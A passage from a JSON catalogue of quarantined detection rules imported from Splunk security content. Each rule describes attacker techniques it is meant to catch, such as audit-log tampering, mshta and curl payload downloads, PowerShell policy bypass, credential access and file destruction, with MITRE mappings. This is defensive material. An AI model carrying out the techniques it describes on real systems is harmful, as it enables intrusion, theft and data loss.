changes that affect the audit log streaming functionality, which is used to send audit events to security monitoring platforms. This behavior could indicate an attacker attempting to prevent their malicious activities from being logged and detected by tampering with the audit trail. For a SOC, identifying modifications to audit logging is critical as it may be a precursor to other attacks where adversaries want to operate undetected. 
The impact could be severe as organizations lose visibility into user actions, configuration changes, and security events within their GitHub Enterprise environment, potentially allowing attackers to perform malicious activities without detection. This creates a significant blind spot in security monitoring and incident response capabilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-modify-audit-log-event-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "99abf2e1-863c-4ec6-82f8-714391590a4c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_modify_audit_log_event_stream.yml" } }, { "id": "splunk-security-content-99d157cb-923f-4a00-aee9-1f385412146f", "type": "detection", "name": "Windows Boot or Logon Autostart Execution In Startup Folder", "description": "The following analytic detects the creation of files in the Windows %startup% folder, a common persistence technique. It leverages the Endpoint.Filesystem data model to identify file creation events in this specific directory. This activity is significant because adversaries often use the startup folder to ensure their malicious code executes automatically upon system boot or user logon. 
If confirmed malicious, this could allow attackers to maintain persistence on the host, potentially leading to further system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-boot-or-logon-autostart-execution-in-startup-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "99d157cb-923f-4a00-aee9-1f385412146f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_boot_or_logon_autostart_execution_in_startup_folder.yml" } }, { "id": "splunk-security-content-99d69078-7dae-4ffe-9f3d-063242772f5a", "type": "detection", "name": "Windows Unusual Intelliform Storage Registry Access", "description": "The following analytic identifies processes accessing Intelliform Storage Registry keys used by Internet Explorer. It leverages Windows Security Event logs, specifically monitoring EventCode 4663, which tracks object access events. This activity is significant because it can indicate unauthorized access or manipulation of sensitive registry keys used for storing form data in Internet Explorer. 
If confirmed malicious, this could lead to data exfiltration, credential theft, or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-intelliform-storage-registry-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "99d69078-7dae-4ffe-9f3d-063242772f5a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_intelliform_storage_registry_access.yml" } }, { "id": "splunk-security-content-9a18f7c2-1fe3-47b8-9467-8b3976770a30", "type": "detection", "name": "Windows MSIExec Spawn WinDBG", "description": "The following analytic identifies the unusual behavior of MSIExec spawning WinDBG. It detects this activity by analyzing endpoint telemetry data, specifically looking for instances where 'msiexec.exe' is the parent process of 'windbg.exe'. This behavior is significant as it may indicate an attempt to debug or tamper with system processes, which is uncommon in typical user activity and could signify malicious intent. 
If confirmed malicious, this activity could allow an attacker to manipulate or inspect running processes, potentially leading to privilege escalation or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-spawn-windbg.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a18f7c2-1fe3-47b8-9467-8b3976770a30", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_spawn_windbg.yml" } }, { "id": "splunk-security-content-9a3e57e7-33f4-470e-b25d-165baa6e8357", "type": "detection", "name": "Windows Computer Account With SPN", "description": "The following analytic detects the addition of Service Principal Names (SPNs) HOST and RestrictedKrbHost to a computer account, indicative of KrbRelayUp behavior. This detection leverages Windows Security Event Logs, specifically EventCode 4741, to identify changes in SPNs. This activity is significant as it is commonly associated with Kerberos-based attacks, which can be used to escalate privileges or perform lateral movement within a network. 
If confirmed malicious, this behavior could allow an attacker to impersonate services, potentially leading to unauthorized access to sensitive resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-computer-account-with-spn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a3e57e7-33f4-470e-b25d-165baa6e8357", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_computer_account_with_spn.yml" } }, { "id": "splunk-security-content-9a4e50c7-5b62-4d52-93b4-f2b61332e9a5", "type": "detection", "name": "Advanced IP or Port Scanner Execution", "description": "The following analytic detects the execution of network scanning utilities such as Advanced IP Scanner or Advanced Port Scanner.\nThese legitimate administrative tools are often leveraged by threat actors and ransomware operators during the discovery phase to enumerate active hosts and open ports within a target environment.\nDetection is based on process creation telemetry referencing known executable names, original file names, or specific command-line parameters such as \"/portable\" and \"/lng\" that are characteristic of these tools.\nIf confirmed malicious, this activity may indicate internal reconnaissance aimed at identifying reachable systems or services prior to lateral movement or further post-compromise actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [ "T1046", "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/advanced-ip-or-port-scanner-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a4e50c7-5b62-4d52-93b4-f2b61332e9a5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/advanced_ip_or_port_scanner_execution.yml" } }, { "id": "splunk-security-content-9a5a41d6-04e7-11ec-923c-acde48001122", "type": "detection", "name": "Get DomainUser with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments used to enumerate domain users via the `Get-DomainUser` command. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions mapped to the `Processes` node of the `Endpoint` data model. This activity is significant as it indicates potential reconnaissance efforts by adversaries or Red Teams using PowerView for Active Directory discovery. 
If confirmed malicious, this could allow attackers to gain situational awareness and identify valuable targets within the domain, potentially leading to further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domainuser-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a5a41d6-04e7-11ec-923c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domainuser_with_powershell.yml" } }, { "id": "splunk-security-content-9a5f4b3e-1d2b-4c6f-9a8e-3b7d2f5c1a6e", "type": "detection", "name": "Windows PsTools Recon Usage", "description": "The following analytic identifies execution of Sysinternals PsTools and Sysinternals Suite binaries that are commonly used for reconnaissance and information gathering on\nWindows endpoints.\nPsTools (PsExec, PsFile, PsGetSid, PsInfo, PsPing, etc.) 
or Sysinternals Suite tools are frequently used by administrators for legitimate maintenance but are also leveraged by threat actors to collect system, account, network and service information during discovery and lateral movement.\nThis detection focuses on process execution and PE metadata telemetry (OriginalFileName).\nIf confirmed malicious, this activity can indicate targeted reconnaissance and foothold escalation, enabling subsequent lateral movement or credential abuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1046", "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-pstools-recon-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a5f4b3e-1d2b-4c6f-9a8e-3b7d2f5c1a6e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_pstools_recon_usage.yml" } }, { "id": "splunk-security-content-9a7a490c-5581-4c95-bab5-a21e351293ef", "type": "detection", "name": "Windows Cisco Secure Endpoint Unblock File Via Sfc", "description": "The following analytic detects the use of the sfc.exe utility with the \"-unblock\" parameter, a feature within Cisco Secure Endpoint. The \"-unblock\" flag is used to remove system blocks imposed by the endpoint protection. This detection focuses on command-line activity that includes the \"-unblock\" parameter, as it may indicate an attempt to restore access to files or processes previously blocked by the security software. 
While this action could be legitimate in troubleshooting scenarios, malicious actors might use it to override protective measures, enabling execution of blocked malicious payloads or bypassing other security mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cisco-secure-endpoint-unblock-file-via-sfc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a7a490c-5581-4c95-bab5-a21e351293ef", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cisco_secure_endpoint_unblock_file_via_sfc.yml" } }, { "id": "splunk-security-content-9a8d5516-4c5e-11ef-9d42-acde48001122", "type": "detection", "name": "Curl Execution with Percent Encoded URL", "description": "The following analytic detects the execution of the curl utility where the command line includes percent-encoded characters and explicit file output options (such as -o or --output).\nIt leverages process execution telemetry from Endpoint Detection and Response (EDR) data sources to identify curl commands that may be using URL encoding to obfuscate download locations or payload paths.\nThis behavior is notable because percent-encoded URLs are commonly used by adversaries to evade simple string-based detections, hide malicious infrastructure, or bypass network security controls.\nWhen combined with file download behavior, this activity may indicate malware staging, payload retrieval, or secondary tool deployment.\nAnalysts should 
review the decoded URL, destination host, parent process, and downloaded file to determine whether the activity is authorized or malicious.\nThe analytic calculates the number of percent (%) characters in the curl command line and triggers when a threshold of three or more is met, indicating potential URL encoding.\nAdjust the threshold as needed based on your environment and tuning requirements.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/curl-execution-with-percent-encoded-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a8d5516-4c5e-11ef-9d42-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/curl_execution_with_percent_encoded_url.yml" } }, { "id": "splunk-security-content-9a8f63a8-43ac-11ec-904c-acde48001122", "type": "detection", "name": "Firewall Allowed Program Enable", "description": "The following analytic detects the modification of a firewall rule to allow the execution of a specific application. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events with command-line arguments related to firewall rule changes. This activity is significant as it may indicate an attempt to bypass firewall restrictions, potentially allowing unauthorized applications to communicate over the network. 
If confirmed malicious, this could enable an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the target environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/firewall-allowed-program-enable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9a8f63a8-43ac-11ec-904c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/firewall_allowed_program_enable.yml" } }, { "id": "splunk-security-content-9b0c2d3e-4f5a-6b7c-8d9e-0f1a2b3c4d5e", "type": "detection", "name": "Cisco Secure Firewall - SSH Connection to Non-Standard Port", "description": "This analytic detects inbound SSH connections to non-standard ports on network devices using Cisco Secure Firewall Intrusion Events. 
APT actors have been observed enabling SSH servers on high, non-default TCP ports to maintain encrypted remote access to compromised network infrastructure.\nThis detection leverages Snort signature 65369 to identify SSH protocol traffic on unusual ports, which may indicate persistence mechanisms or backdoor access established by threat actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-ssh-connection-to-non-standard-port.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b0c2d3e-4f5a-6b7c-8d9e-0f1a2b3c4d5e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___ssh_connection_to_non_standard_port.yml" } }, { "id": "splunk-security-content-9b1a5385-0c31-4c39-9753-dc26b8ce64c2", "type": "detection", "name": "Windows Steal Authentication Certificates Certificate Issued", "description": "The following analytic identifies the issuance of a new certificate by Certificate Services - AD CS, detected via Event ID 4887. This event logs the requester user context, DNS hostname of the requesting machine, and the request time. Monitoring this activity is crucial as it can indicate potential misuse of authentication certificates. If confirmed malicious, an attacker could use the issued certificate to impersonate users, escalate privileges, or maintain persistence within the environment. 
This detection helps in identifying and correlating suspicious certificate-related activities for further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-certificate-issued.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b1a5385-0c31-4c39-9753-dc26b8ce64c2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_certificate_issued.yml" } }, { "id": "splunk-security-content-9b2b819d-c76b-4dc6-bd3d-148edb8de83e", "type": "detection", "name": "Zoom Rare Video Devices", "description": "Detects rare video devices from Zoom logs. Actors performing Remote Employment Fraud (REF) typically use unusual device information compared to a majority of employees. 
Detecting this activity requires careful analysis, regular review, and a thorough understanding of the audio and video devices commonly used within your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zoom-rare-video-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b2b819d-c76b-4dc6-bd3d-148edb8de83e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/zoom_rare_video_devices.yml" } }, { "id": "splunk-security-content-9b3af1e6-5b68-11eb-ae93-0242ac130002", "type": "detection", "name": "Detect MSHTA Url in Command Line", "description": "The following analytic detects the use of Microsoft HTML Application Host (mshta.exe) to make remote HTTP or HTTPS connections. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line arguments containing URLs. This activity is significant because adversaries often use mshta.exe to download and execute remote .hta files, bypassing security controls. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further network infiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-mshta-url-in-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b3af1e6-5b68-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_mshta_url_in_command_line.yml" } }, { "id": "splunk-security-content-9b5e7c14-f8d2-4a3b-b1a7-e5c9f2a8d123", "type": "detection", "name": "Windows AppX Deployment Unsigned Package Installation", "description": "The following analytic detects attempts to install unsigned MSIX/AppX packages using the -AllowUnsigned parameter. This detection leverages Windows event logs from the AppXDeployment-Server, specifically focusing on EventID 603 which indicates the start of a deployment operation with specific deployment flags. The flag value 8388608 corresponds to the -AllowUnsigned option in PowerShell's Add-AppxPackage cmdlet. This activity is significant as adversaries have been observed leveraging unsigned MSIX packages to deliver malware, bypassing signature verification that would normally protect users from malicious packages. 
If confirmed malicious, this could allow attackers to execute arbitrary code, establish persistence, or deliver malware while evading traditional detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-appx-deployment-unsigned-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b5e7c14-f8d2-4a3b-b1a7-e5c9f2a8d123", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_appx_deployment_unsigned_package_installation.yml" } }, { "id": "splunk-security-content-9b5f1832-e8b9-453f-93df-07a3d6a72a45", "type": "detection", "name": "Kubernetes Unauthorized Access", "description": "The following analytic detects unauthorized access attempts to Kubernetes by analyzing Kubernetes audit logs. It identifies anomalies in access patterns by examining the source of requests and their response statuses. This activity is significant for a SOC as it may indicate an attacker attempting to infiltrate the Kubernetes environment. 
If confirmed malicious, such access could lead to unauthorized control over Kubernetes resources, potentially compromising sensitive systems or data within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-unauthorized-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b5f1832-e8b9-453f-93df-07a3d6a72a45", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_unauthorized_access.yml" } }, { "id": "splunk-security-content-9b62da2c-e442-474f-83ca-fac4dabab1b3", "type": "detection", "name": "Windows File and Directory Permissions Remove Inheritance", "description": "The following analytic detects the removal of permission inheritance using ICACLS. This analytic identifies instances where ICACLS is used to remove permission inheritance from files or directories. The /inheritance:r flag, which strips inherited permissions while optionally preserving or altering explicit permissions, is monitored to detect changes that may restrict access or establish isolated permission configurations. 
Removing inheritance can be a legitimate administrative action but may also indicate an attempt to conceal malicious activity or bypass inherited security controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-and-directory-permissions-remove-inheritance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b62da2c-e442-474f-83ca-fac4dabab1b3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_and_directory_permissions_remove_inheritance.yml" } }, { "id": "splunk-security-content-9b6aae5e-8d85-11ec-b2ae-acde48001122", "type": "detection", "name": "Linux DD File Overwrite", "description": "The following analytic detects the use of the 'dd' command to overwrite files on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because adversaries often use the 'dd' command to destroy or irreversibly overwrite files, disrupting system availability and services. 
If confirmed malicious, this behavior could lead to data destruction, making recovery difficult and potentially causing significant operational disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-dd-file-overwrite.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9b6aae5e-8d85-11ec-b2ae-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_dd_file_overwrite.yml" } }, { "id": "splunk-security-content-9bbc62e8-55d8-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious microsoft workflow compiler usage", "description": "The following analytic identifies the usage of microsoft.workflow.compiler.exe, a rarely utilized executable typically found in C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution telemetry. The significance of this activity lies in its uncommon usage, which may indicate malicious intent such as code execution or persistence mechanisms. 
If confirmed malicious, an attacker could leverage this process to execute arbitrary code, potentially leading to unauthorized access or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-microsoft-workflow-compiler-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9bbc62e8-55d8-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml" } }, { "id": "splunk-security-content-9bce3a97-bc97-4e89-a1aa-ead151c82fbb", "type": "detection", "name": "Windows Remote Services Allow Remote Assistance", "description": "The following analytic detects modifications in the Windows registry to enable remote desktop assistance on a targeted machine. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the \"Control\\\\Terminal Server\\\\fAllowToGetHelp\" registry path. This activity is significant because enabling remote assistance via registry is uncommon and often associated with adversaries or malware like Azorult. 
If confirmed malicious, this could allow an attacker to remotely access and control the compromised host, leading to potential data exfiltration or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-services-allow-remote-assistance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9bce3a97-bc97-4e89-a1aa-ead151c82fbb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_services_allow_remote_assistance.yml" } }, { "id": "splunk-security-content-9be30d80-3a39-4df9-9102-64a467b24eac", "type": "detection", "name": "Log4Shell CVE-2021-44228 Exploitation", "description": "The following analytic identifies potential exploitation of Log4Shell CVE-2021-44228 by correlating multiple MITRE ATT&CK tactics detected in risk events. It leverages Splunk's risk data model to calculate the distinct count of MITRE ATT&CK tactics from Log4Shell-related detections. This activity is significant because it indicates a high probability of exploitation if two or more distinct tactics are observed. 
If confirmed malicious, this activity could lead to initial payload delivery, callback to a malicious server, and post-exploitation activities, potentially resulting in unauthorized access, lateral movement, and further compromise of the affected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1190", "T1059", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/log4shell-cve-2021-44228-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9be30d80-3a39-4df9-9102-64a467b24eac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/log4shell_cve_2021_44228_exploitation.yml" } }, { "id": "splunk-security-content-9be56c82-b1cc-4318-87eb-d138afaaca39", "type": "detection", "name": "Malicious PowerShell Process - Execution Policy Bypass", "description": "The following analytic detects PowerShell processes initiated with parameters that bypass the local execution policy for scripts. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing specific flags like \"-ex\" or \"bypass.\" This activity is significant because bypassing execution policies is a common tactic used by attackers to run malicious scripts undetected. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to further system compromise, data exfiltration, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/malicious-powershell-process-execution-policy-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9be56c82-b1cc-4318-87eb-d138afaaca39", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/malicious_powershell_process___execution_policy_bypass.yml" } }, { "id": "splunk-security-content-9c24aef6-cad9-4931-acce-74318aa5663b", "type": "detection", "name": "Windows Security And Backup Services Stop", "description": "The following analytic detects the suspicious termination of known services commonly targeted by ransomware before file encryption. It leverages Windows System Event Logs (EventCode 7036) to identify when critical services such as Volume Shadow Copy, backup, and antivirus services are stopped. This activity is significant because ransomware often disables these services to avoid errors and ensure successful file encryption. 
